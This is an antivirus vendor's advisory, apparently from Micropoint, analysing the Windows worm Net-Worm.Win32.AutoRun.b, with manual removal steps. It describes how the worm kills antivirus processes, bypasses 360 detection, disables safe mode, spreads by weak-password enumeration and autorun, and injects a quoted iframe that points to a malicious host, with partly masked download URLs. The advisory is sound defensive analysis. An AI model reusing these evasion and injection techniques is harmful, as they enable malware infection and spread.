網絡蠕蟲
Net-Worm.Win32.AutoRun.b
捕獲時間
2009-9-24
危害等級
高
病毒癥狀
該樣本是使用“VC”編寫的蠕蟲病毒,由微點主動防御軟件自動捕獲,采用“UPX”加殼方式,企圖躲避特征碼掃描,加殼后長度為“24,064 字節 ”,圖標為“
”,病毒擴展名為“exe”,主要通過“文件捆綁”、“下載器下載”、“移動存儲介質”、“網頁掛馬”等方式傳播,病毒主要目的為實現網絡病毒傳播。
用戶中毒后,會出現殺毒軟件無故退出、系統運行緩慢、網絡速度降低、出現大量未知進程等現象。
感染對象
Windows 2000/Windows XP/Windows 2003
傳播途徑
網頁木馬、文件捆綁、下載器下載
防范措施
已安裝使用微點主動防御軟件的用戶,無須任何設置,微點主動防御將自動保護您的系統免受該病毒的入侵和破壞。無論您是否已經升級到最新版本,微點主動防御都能夠有效清除該病毒。如果您沒有將微點主動防御軟件升級到最新版,微點主動防御軟件在發現該病毒后將報警提示您發現“未知后門程序”,請直接選擇刪除處理(如圖1);
圖1 微點主動防御軟件自動捕獲未知病毒(未升級)
如果您已經將微點主動防御軟件升級到最新版本,微點將報警提示您發現"Net-Worm.Win32.AutoRun.b”,請直接選擇刪除(如圖2)。
圖2 微點主動防御軟件升級后截獲已知病毒
未安裝微點主動防御軟件的手動解決辦法:
1、手動恢復以下文件:
拷貝相同版本文件到: %SystemRoot%\system32\qmgr.dll
拷貝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts
手動或用工具清除所有壓縮包中的病毒
手動或用工具恢復所有網頁文件。
2、手動刪除以下文件:
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X為所有盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X為所有盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X為所有盤符)
3、手動刪除以下注冊表值:
鍵: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\[所有劫持]
4、手動恢復以下注冊表值:
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS
值: Start
數據: 0x00000003
修復安全模式:
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
變量聲明:
%SystemDriver% 系統所在分區,通常為“C:\”
%SystemRoot% WINDODWS所在目錄,通常為“C:\Windows”
%Documents and Settings% 用戶文檔目錄,通常為“C:\Documents and Settings”
%Temp% 臨時文件夾,通常為“C:\Documents and Settings\當前用戶名稱\Local Settings\Temp”
%ProgramFiles% 系統程序默認安裝目錄,通常為:“C:\ProgramFiles”
病毒分析
(1)停止名為"BITS"的服務,去掉%SystemRoot%\system32\qmgr.dll文件保護屬性,并釋放動態鏈接
庫%SystemRoot%\system32\qmgr.dll,替換掉正常的qmgr.dll,啟動"BITS"服務,通過該服務加載病毒程序。
(2)檢查%SystemRoot%\system32\qmgr.dll是否被360tray.exe檢測,如果是,則創建一個名為"360SpShadow0"的設備,通過發送IO控
制碼的方式控制該設備從而繞過360tray.exe的檢測。
(3) 創建線程,獲取當前進程快照,查找進程"avp.exe"、"bdagent.exe"、"360tray.exe"是否存在,如果找到,則
將%SystemRoot%\system32\qmgr.dll復制為%SystemRoot%\system32\1l1.dll,將%SystemRoot%\system32\1l1.dll注入到目標進
程空間,并將殺軟進程主線程終止,使其進程退出,完成之后,刪除%SystemRoot%\system32\1l1.dll。
(4)創建線程,刪除注冊表相關鍵值,使用戶無法進入安全模式,創建名為"SvcMain"的服務,釋放驅動%TEMP%\SvcMain.sys并加載,
通過該驅動程序恢復SSDT,完成之后,刪除%TEMP%\SvcMain.sys,并刪除服務對應的注冊表鍵值。之后,刪除大部分殺軟的服務,
并作鏡像劫持。
(5)創建線程,查找所有文件后綴名為htm、html、asp、aspx的網頁文件,如果找到,往目標文件中插入代碼<iframe
src=http://mm.uu8***7.cn/index/mm.htm width=100 height=0></iframe>,并開啟一個新進程執行%ProgramFiles%\Internet
Explorer\iexplore.exe,通過iexplore.exe訪問嵌入的惡意網址。
(6)創建線程,新建文件%TEMP%\TempLocal.txt,訪問目標網址讀取內容,將讀取的內容寫入TempLocal.txt,并訪問TempLocal.txt文
件中保存的網址,下載新病毒到本地運行。
(7)查找并修改文件%SystemRoot%\System32\drivers\etc\hosts。
(8)釋放文件%SystemRoot%\System32\dllcache\lsasvc.dll,并運行。
(9)創建線程,遍歷所有盤符,查找所有rar壓縮包文件,如果找到,通過調用%ProgramFiles%\WinRAR\Rar.exe程序將其解壓,將 病毒程序復制到解壓出的文件夾中,然后再壓縮回去,完成將病毒添加到壓縮包中的功能。
(10)創建線程,掃描局域網其它主機,并通過自帶的弱口令列表嘗試枚舉其它主機的管理密碼,如果枚舉成功,從指定網址下載病毒程
序到本地執行,并復制到其它主機的所有共享文件夾中運行。
(11)創建線程,遍歷當前所有盤符,在每個盤符下創建文件autorun.inf,并在每個盤符下創建文件夾recycle.{645FF040-5081-101B- 9F08-00AA002F954E},并將%SystemRoot%\System32\dllcache\lsasvc.dll重命名為Ghost.exe復制到
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,使用戶一但雙擊磁盤或打開資源管理器自動運行病毒Ghost.exe
(12)創建線程,不斷讀取%TEMP%\TempLocal.txt文件中的網址,下載新病毒。
(13)創建線程,釋放病毒程序%TEMP%\syshost.exe,并開啟新進程執行該程序。
(14) 釋放批處理文件%TEMP%\TempDel.bat,并運行,將病毒自身重命名復制到%SystemRoot%\system32\dllcache\lsasvc.dll,之后刪除自身和TempDel.bat。
病毒創建文件:
%TEMP%\SvcMain.sys
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%TEMP%\TempDel.bat
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X為各個盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X為各個盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X為各個盤符)
病毒修改文件:
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\system32\drivers\etc\hosts
病毒刪除文件:
%TEMP%\SvcMain.sys
%TEMP%\TempDel.bat
病毒創建進程:
iexplore.exe
病毒創建注冊表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[映像劫持]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
病毒修改注冊表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ BITS\Start
病毒刪除注冊表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
病毒訪問網絡:
http://mm.uu***67.cn/index/mm.htm
http://www.d***04.com/msn/mm.txt
http://www.d***567.cn/down/qqmm.exe
http://www.d***567.cn/down/qqma.exe
